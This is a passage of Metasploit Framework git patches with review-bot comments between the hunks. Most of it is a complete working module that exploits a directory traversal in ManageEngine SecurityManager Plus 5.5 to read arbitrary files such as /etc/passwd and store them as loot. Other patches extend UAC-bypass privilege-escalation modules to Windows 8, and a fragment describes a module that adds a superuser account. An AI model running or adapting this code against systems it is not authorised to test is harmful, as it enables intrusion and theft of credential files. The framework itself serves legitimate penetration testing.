@@ -33,7 +33,9 @@ class Metasploit3 < Msf::Post Successful exploitation results in the creation of a new superuser account. - This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd. + This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap + files and truncate /etc/passwd. Note that if this module fails, you can potentially induce + a permanent DoS on the target by corrupting the /etc/passwd file. }, 'License' => MSF_LICENSE, 'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'], From 2a202e9035b771cf8b07ad41f36209bd1e54b3d6 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 29 Oct 2012 12:23:48 -0500 Subject: [PATCH 70/74] Add OSVDB-86563 ManageEngine SecurityManager dir traversal --- .../manageengine_securitymanager_traversal.rb | 92 +++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb new file mode 100644 index 0000000000..b716be0c79 --- /dev/null +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb 
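Review bot: The clean-up instruction still says to "truncate /etc/passwd", which taken literally empties the file and causes exactly the permanent DoS the new sentence warns about; what the operator actually has to do is delete the appended packet data and the added account line (everything after the original last entry) or restore the file from a backup. Suggested wording for that line: `files and remove the appended packet data and the added account from /etc/passwd (or restore it from a backup).`. The description continues outside the hunk on both sides.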
@@ -0,0 +1,92 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ManageEngine SecurityManager Plus 5.5 Directory Traversal', + 'Description' => %q{ + This module exploits a directory traversal flaw found in ManageEngine + SecurityManager Plus 5.5 or less. When handling a file download request, + the DownloadServlet class fails to properly check the 'f' parameter, which + can be abused to read any file outside the virtual directory. + }, + 'References' => + [ + ['OSVDB', '86563'], + ['EDB', '22092'] + ], + 'Author' => + [ + 'blkhtc0rp', #Original + 'sinn3r' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Oct 19 2012" + )) + + register_options( + [ + OptPort.new('RPORT', [true, 'The target port', 6262]), + OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']), + OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']), + OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10]) + ], self.class) + end + + + def run_host(ip) + base = target_uri.path + base << '/' if base[-1,1] != '/' + + peer = "#{ip}:#{rport}" + fname = datastore['FILE'] + + print_status("#{peer} - Reading '#{datastore['FILE']}'") + traverse = "../" * datastore['DEPTH'] + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}store", + 'vars_get' => { + 'f' => "#{traverse}#{datastore['FILE']}" + } + }) + + + if res and res.code == 500 and res.body =~ /Error report/ + print_error("Cannot obtain '#{fname}', here are some possible reasons:") + print_error("\t1. 
File does not exist.") + print_error("\t2. The server does not have any patches deployed.") + print_error("\t3. Your 'DEPTH' option isn't deep enough.") + print_error("\t4. Some kind of permission issues.") + + elsif res and res.code == 200 + data = res.body + p = store_loot( + 'manageengine.securitymanager', + 'application/octet-stream', + ip, + data, + fname + ) + + vprint_line(data) + print_good("#{peer} - #{fname} stored as '#{p}'") + + else + print_error("#{peer} - Fail to obtain file for some unknown reason") + end + end + +end \ No newline at end of file From c878b9077b3384cc03abb43bc2b4ed049a43eefa Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 29 Oct 2012 12:25:07 -0500 Subject: [PATCH 71/74] Rename the DeviceExpert module to avoid confusion --- ...engine_traversal.rb => manageengine_deviceexpert_traversal.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/http/{manageengine_traversal.rb => manageengine_deviceexpert_traversal.rb} (100%) diff --git a/modules/auxiliary/scanner/http/manageengine_traversal.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb similarity index 100% rename from modules/auxiliary/scanner/http/manageengine_traversal.rb rename to modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb From 8c46c59142e895a46d620e4b6d57a8b087ac84b2 Mon Sep 17 00:00:00 2001 From: sagishahar Date: Mon, 29 Oct 2012 20:11:27 +0200 Subject: [PATCH 72/74] Add support to Windows 8 Verified with Windows 8 Enterprise Evaluation --- modules/post/windows/escalate/bypassuac.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/escalate/bypassuac.rb b/modules/post/windows/escalate/bypassuac.rb index 7921f096b6..209f7c4d78 100644 --- a/modules/post/windows/escalate/bypassuac.rb +++ b/modules/post/windows/escalate/bypassuac.rb 
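Review bot: The success branch `elsif res and res.code == 200` stores whatever came back as loot and prints success, so a 200 with an empty body (a file the servlet could not open, or one that exists but is empty) is reported as a retrieved file; `elsif res and res.code == 200 and res.body and not res.body.empty?` with a separate message for the empty case makes the result trustworthy. Two smaller things: `base << '/'` mutates the string returned by `target_uri.path` in place, which is harmless only if that accessor hands back a fresh String on every call, and `"Fail to obtain file for some unknown reason"` should read `"Failed to obtain file for some unknown reason"`. `FILE` defaults to an absolute path, so the request presumably relies on the servlet collapsing `../..//etc/passwd`; a comment saying so, and that a Windows target needs a different FILE and DEPTH, would help.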
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post
 vuln = false
 sysinfo = session.sys.config.sysinfo
 winver = sysinfo["OS"]
- affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ]
+ affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008', 'Windows 8' ]
 affected.each { |v|
 if winver.include? v
 vuln = true
From 53c7479d70377d05a17973e1e560ec49581a6a78 Mon Sep 17 00:00:00 2001
From: sagishahar
Date: Mon, 29 Oct 2012 20:12:47 +0200
Subject: [PATCH 73/74] Add Windows 8 support
Verified with Windows 8 Enterprise Evaluation
---
modules/exploits/windows/local/bypassuac.rb | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb
index d02b18e05a..a0d30aac47 100644
--- a/modules/exploits/windows/local/bypassuac.rb
+++ b/modules/exploits/windows/local/bypassuac.rb
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Local
 #
 vuln = false
 winver = sysinfo["OS"]
- affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ]
+ affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008', 'Windows 8' ]
 affected.each { |v|
 if winver.include? v
 vuln = true
From 5e873d06972279b99306b7e4563bb530a2620888 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 30 Oct 2012 12:15:01 +0100
Subject: [PATCH 74/74] adding peer information to error message
---
.../scanner/http/manageengine_securitymanager_traversal.rb | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb
index b716be0c79..94d7797e8e 100644
--- a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb
+++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb
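Review bot: The `affected` list and the `winver.include?` loop around it are now identical in modules/post/windows/escalate/bypassuac.rb and modules/exploits/windows/local/bypassuac.rb (the second hunk on this line), so every future OS addition has to be made twice, as this pair of commits already shows; a single frozen constant shared by both modules would remove the duplication. If the `each` block does nothing beyond setting the flag (its end lies outside the hunk), `vuln = affected.any? { |v| winver.include?(v) }` replaces the each/if/flag pattern in both files. The match is a plain substring test, so a bare 'Windows 8' entry is also satisfied by any later version string that begins with those characters; a comment above the list, `# substring match: entries are prefixes, re-check them when a new release ships`, would make that explicit for whoever adds the next entry. The enclosing method starts and ends outside both hunks.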
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
 
 
 if res and res.code == 500 and res.body =~ /Error report/
- print_error("Cannot obtain '#{fname}', here are some possible reasons:")
+ print_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:")
 print_error("\t1. File does not exist.")
 print_error("\t2. The server does not have any patches deployed.")
 print_error("\t3. Your 'DEPTH' option isn't deep enough.")
@@ -89,4 +89,4 @@ class Metasploit3 < Msf::Auxiliary
 end
 end
 
-end
\ No newline at end of file
+end
